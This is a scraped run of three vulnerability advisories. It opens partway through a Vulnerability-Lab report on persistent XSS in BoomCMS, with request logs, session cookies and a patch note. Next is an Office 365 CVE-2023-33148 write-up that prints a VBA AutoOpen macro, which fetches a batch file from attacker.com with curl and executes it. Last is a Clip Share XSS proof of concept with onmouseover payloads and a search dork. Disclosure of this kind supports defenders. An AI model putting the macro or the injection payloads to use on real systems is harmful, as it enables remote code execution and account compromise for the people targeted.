keep-alive<br />Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]<br />Sec-Fetch-Site: same-origin<br />{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",<br />"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by"<br />:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}<br />-<br />PUT: HTTP/1.1 200 OK<br />Server: Apache<br />Cache-Control: no-cache, private<br />Set-Cookie: Max-Age=7200; path=/<br />Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF<br />VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY<br />yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;<br />Max-Age=7200; path=/; httponly<br />Content-Length: 242<br />Connection: Keep-Alive<br />Content-Type: application/json<br />-<br />https://localhost:8000/boomcms/asset-manager/albums/[evil.source]<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br />Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF<br />VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY<br />yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;<br />-<br />GET: HTTP/1.1 200 OK<br />Server: Apache<br />Cache-Control: no-cache, private<br />Set-Cookie:<br />Vary: Accept-Encoding<br />Content-Length: 7866<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=UTF-8<br />-<br /><br /><br />Vulnerable Source: asset-manager/albums/[ID]<br /><br /><li data-album="36"><br /> <a href="#albums/20"><br /> <div><br /> <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3><br /> <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p><br /> <p class='count'><span>0</span> assets</p><br /> </div><br /> </a><br /> </li><br /></iframe></p></div></a></li></ul></div></div><br /> </div><br /><br /> <div id="b-assets-view-asset-container"></div><br /> <div id="b-assets-view-selection-container"></div><br /> <div id="b-assets-view-album-container"><div><div id="b-assets-view-album"><br /> <div class="heading"><br /> <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1><br /> <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p><br /> </div><br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.<br />Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation web vulnerability in the application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of<br />Privilege Vulnerability + RCE.<br />## Author: nu11secur1ty<br />## Date: 07.18.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office<br />## Reference: https://portswigger.net/web-security/access-control<br />## CVE-2023-33148<br /><br /><br />## Description:<br />The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to<br />Elevation of Privilege.<br />The attacker can use this vulnerability to attach a very malicious<br />WORD file in the Outlook app which is a part of Microsoft Office 365<br />and easily can trick the victim to click on it - opening it and<br />executing a very dangerous shell command, in the background of the<br />local PC. This execution is without downloading this malicious file,<br />and this is a potential problem and a very dangerous case! This can be<br />the end of the victim's PC, it depends on the scenario.<br />WARNING! Office 365 executes files directly from Outlook, without temp<br />downloading, security checking and etc.<br /><br /><br />## Staus: HIGH Vulnerability<br /><br />[+]Exploit:<br /><br />- - - NOTE:<br />This exploit is connected to the third-party server, and when the<br />victim clicks on it and opens it the content of the script which is<br />inside will fetch on the machine locally and execute himself by using<br />MS Office 365 and Outlook app which is a part of the 365 API.<br /><br />```vb<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat<br />&& .\salaries.bat", vbNormalFocus)<br />End Sub<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Clip Share 4.1.4 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.clip-share.com/ |<br />| # Dork : Powered By ClipShare |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Xss :<br /><br /> This vulnerability affects /ClipShare/signup. <br /> URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /> URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>